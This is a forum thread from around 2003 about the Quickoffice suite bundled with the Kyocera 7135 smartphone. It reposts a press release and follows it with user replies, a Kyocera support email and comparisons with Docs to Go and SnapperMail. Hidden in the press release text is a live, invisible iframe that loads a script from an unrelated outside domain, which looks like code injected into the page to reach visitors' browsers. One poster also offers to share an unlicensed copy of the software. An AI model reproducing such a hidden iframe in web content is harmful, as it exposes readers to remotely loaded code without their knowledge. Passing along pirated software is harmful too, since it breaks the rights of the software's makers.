+ Reply to Thread
Page 1 of 4 1 2 3 4 LastLast

Quickoffice on 7135

QUICKOFFICE SELECTED FOR INCLUSION WITH KYOCERA WIRELESS CORP.’S AWARD-WINNING 7135 SMARTPHONE

Quickoffice Enables Mobile Professionals to View and Edit Microsoft Word and Excel Files

SCOTTSDALE, Ariz., February 11, 2003 — Mobility Electronics, Inc. (Nasdaq/NMS: MOBE), a leading provider of innovative portable computing solutions for the mobile computer user, announced its Cutting Edge Software subsidiary’s Quickoffice for Palm OS handhelds has been selected by Kyocera Wireless Corp. for inclusion with the groundbreaking, third-generation Kyocera 7135 smartphone. Both Quickoffice Pro and the Kyocera 7135 smartphone recently were named by Handheld Computing Magazine as two of the top 40 mobile technologies of 2002. The Kyocera 7135 is the first converged smartphone and personal digital assistant running Palm OS to ship with the ability to view, edit, and create Microsoft® Word- and Excel-compatible files.

Quickoffice includes the Quicksheet spreadsheet and Quickword word processor with bi-directional synchronization to each application’s Microsoft Office counterpart, enabling anytime, anywhere access to critical business files. Quickoffice has long been the top choice among mobile professionals upgrading their Palm Powered handhelds’ functionality and is available for purchase both online and in retail stores.

“Whether it’s access to e-mail, calendars and contacts or the ability to import documents from the Microsoft Office suite of applications, the Kyocera 7135 smartphone offers everything a mobile professional needs,” said Dave Whalen, corporate vice president of sales and marketing at Kyocera Wireless Corp. “Quickoffice is an elegant mobile office solution for any user of the Kyocera 7135 smartphone whose demands include access to Word and Excel files, the de facto standards for business documents.”

Quickoffice version 6.2 will be provided to purchasers of the Kyocera 7135 smartphone as part of the phone’s accompanying CD-ROM, and those customers will be given priority access to obtain other hardware and software from the iGo family of mobile solutions. Kyocera customers also can upgrade to Quickoffice Pro, enabling them to deliver high-resolution PowerPoint presentations directly from the Kyocera 7135 smartphone via the iGo Pitch Solo slideshow display adapter (sold separately).

“For mobile professionals looking for an all-in-one solution, the coupling of the Kyocera 7135 smartphone and Quickoffice offers the most wireless computing power in the smallest package available,” said Paul Moreton, Cutting Edge Software’s vice president of operations and sales. “Combining the most feature-rich converged Palm OS handset with Quickoffice provides an unequalled level of functionality.”

To further expand the mobile computing capabilities of the Kyocera 7135 smartphone, users have the option of purchasing additional solutions to address their specific needs:

*Cutting Edge Software’s Mobilefile remote file management solution enables anywhere, anytime access to files, loading and removal of applications, and retrieval of editable documents stored on PCs;

*The iGo Pitch Solo presentation adapter allows mobile users to present dynamic presentations using Palm OS handhelds and Quickpoint presentation software;

*Leading mobile e-mail solutions for the Quickoffice platform, including Snapperfish SnapperMail or Corsoft Aileron, enable users to send Excel, Word and PowerPoint attachments to Palm OS handheld users with automatic file conversion, allowing them to open, view and edit files on the device, then e-mail them back to colleagues at the office;

*Bachmann Software’s PrintBoy enables users to wirelessly print Quicksheet, Quickword, or Quickpoint documents, as well as contact information, to-do lists, or other data from built-in Palm OS applications.

About Mobility Electronics, Inc.
    Mobility Electronics Inc., based in Scottsdale, Ariz., is a leading designer, developer and marketer of innovative products and solutions for the mobile computing user. The company’s unique product portfolio includes widely compatible docking stations for portable computers; connectivity and video products for handheld computing devices; expansion products for desktop, server and portable computers; and power products and accessories for portable computing devices of all types. The company’s technology base includes its award-winning Split Bridge® technology and multi-function Card Bus, high-speed bus expansion and portable computing device power technologies.

Mobility Electronics possesses a broad range of internally developed intellectual property with numerous patents, patents pending, license agreements and/or strategic relationships with industry leaders such as Avocent, LSI Logic, Molex Corporation, National Instruments, 2C Computing, and Philips Semiconductors. The company’s subsidiaries include MAGMA, which focuses on expansion products; Portsmith, Inc., which focuses on the handheld market; Cutting Edge Software, Inc., which develops, markets and supports software solutions for the mobile professional and enterprises; and iGo Direct Corporation, which is a leading mobile computer solution provider. Mobility Electronics markets its products through a worldwide network of OEMs, distributors, resellers, retail channels and direct catalog and e-commerce channels.

For information on Mobility Electronics’ products and services, call 480-596-0061, or visit its Web site at www.mobilityelectronics.com.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I don't have time to read this all right now... but I am a big QuickOffice fan and it sounds like there are a lot of recent enhancements that will really take advantage of the 7135's unique features! :clap
    Please visit my picture site: Robert-O-Rama :)

Hmm, what about us early adopters? Do we get screwed?

Jeff
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

I already use Quickoffice and it is pretty good -- especially Quicksheet. Quickword is OK but nothing to write home about. I don't think you are screwed Jeff. Someone mentioned on another thread that you can probably request a replacement disk from Kyocera with the new software.
    iPhone 4S BB8830/Treo700wx/Treo700w/ XV6600/Treo600/Kyo7135

Originally posted by djjefft
    Hmm, what about us early adopters? Do we get screwed?

Jeff
    Most likely :o
    Larry Ganz
    http://www.jesusreigns.org
    John 3:16

Originally I asked them if early adopters were going to be able to get in on this. he stated that the makers of quickoffice were the ones that did the press release and not them. then this morning I found this email sent to me which ive included in this post. I dont have any other info than what he has sent me here.

See ya,
    pblwzrd

Hello (omitted by pblwzrd),

Thank you for contacting Kyocera Wireless. I have received additional
    information about the QuickOffice release.

QuickOffice will be supplied via an exclusive offer for customers who
    purchase the 7135 SmartPhone from Verizon. The availability of the 7135
    from Verizon is dependant upon the finalization of testing of the phone
    by Verizon and the announcement by Verizon of the commencement of sales
    of the 7135 SmartPhone.

If you have already activated a 7135 SmartPhone with Verizon, you will
    need to contact Verizon to discuss the possible availability of the software
    once Verizon has announced the completion of testing and the start of
    sales of the 7135 SmartPhone.

If your issue is still unresolved, do not hesitate to contact us again.

For any future issues, please visit: http://support.kyocera-wireless.com/
    to get instant graphical answers to your questions.

Kind Regards,
    (omitted by pblwzrd)
    Kyocera Technical Support
    Support@Kyocera-wireless.com

How does QuickOffice compare to Docs to Go?

Sheesh, I'm already wondering how easy or difficult it might be to get my firmware upgraded with Verizon. Now I have to beg them for a new CD too? And where is Verizon supposed to get these CD's?

PM me for quickoffice

I have a copy. PM me for it.

I am happy with Docs to Go, no complaints other than it syncs slower than I'd like with 2mb of MS Word and Excel files. I got the cheaper $49 version without email, pdf reader, etc...
    Larry Ganz
    http://www.jesusreigns.org
    John 3:16

Is there software that permits one to at least look at Powerpoint attachments?

Originally posted by msneider
    Is there software that permits one to at least look at Powerpoint attachments?
    Looks like QuickOffice Pro Does that!

http://www.quickoffice.com/quickoffice_pro/index.html

Jeff
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

I have DocsToGo and I have tried Quick Office. On Powerpoint slides, DocsToGo is much much faster and you can edit the PPT. Quick Office can look better but it is so slow, about 10 seconds to load a slide from RAM if I recall correctly and slower yet from SD card. Maybe I was doing something wrong as I had color set to high color.

John
    John

For more information see barJohn Reviews It

Quickoffice/Snappermail

I thought this is "worthy" of its own thread. As some have heard, the latest version of Quickoffice (Premiere), combined with Snappermail, allows for reading and editing "native" MS word/excel attachments on the 7135. Some seem to be using it with no problems, others have had fatal exceptions. My experience is that when it works, it's great. But I've had some Word attachments that when trying to view on quickoffice I get the message, "This appears to not be a valid MS file...." Quickoffice then tries to open it anyway, and crashes, requiring a soft reset. Any other experiences/ thoughts....

I haven't fooled with it yet, but have it installed.

One thing to keep in mind is that this really isn't much of a change for SnapperMail. What they did was code the client to direct the proper attachments to Quick Office Premiere. Quick Office Premier will open native attachments regardless of where they came from, so any mail application capable of downloading native attachments, and detaching them to internal/external memory will work for this. At the same time, loading MS documents to a card separately, or receiving them via a BEAM, WiFi, etc, will still be able to be opened in Quick Office Premiere.

I have been playing around with the combination of QuickOffice Premier and SnapperMail a lot since I got Premier yesterday. So far the only problem I'm having is in syncing PowerPoint files... the conduit isn't working for some reason. But Word and Excel files are working great. This morning I did a test where I sent an e-mail from SnapperMail, attached an Excel file right from the SD card, and e-mailed it to a guy I work with... it worked perfectly. I definitely think this combo of QuickOffice Premier and SnapperMail is a HUGE step in a positive direction!
    Please visit my picture site: Robert-O-Rama :)

So far so good for me. I emailed my phone an email with my resume attached (Word document). I got the email, tapped on the attachment and QuickOffice Premiere opened it flawlessly. I'm happy.
    ~'kito
    pdaPhoneHome Moderator

Good to hear Markito--- now your going to have to show me that sometime!
    iPhone therefore iAm.

Originally posted by Robert K.
    I have been playing around with the combination of QuickOffice Premier and SnapperMail a lot since I got Premier yesterday. So far the only problem I'm having is in syncing PowerPoint files... the conduit isn't working for some reason. ....... I definitely think this combo of QuickOffice Premier and SnapperMail is a HUGE step in a positive direction!
    "Dumb" question: How is this supposed to work with Power Point. Are you supposed to be able to "view" the presentation on the Palm Device, or just move a file as an attachment from one place to another?

I hope this isn't old news, I did a quick scan of this thread but didn't find anything. I visited the Quickoffice website today so I could do a quick comparison between Quickoffice and Docs2Go. There on the lefthand side about half way down on the main page, is a hyperlink and a moderately sized image for Kyocera 7135 users to activate their Quickoffice software. Looks like their ready. Again, I hope this isn't old news. http://www.cesinc.com/

falstaffpac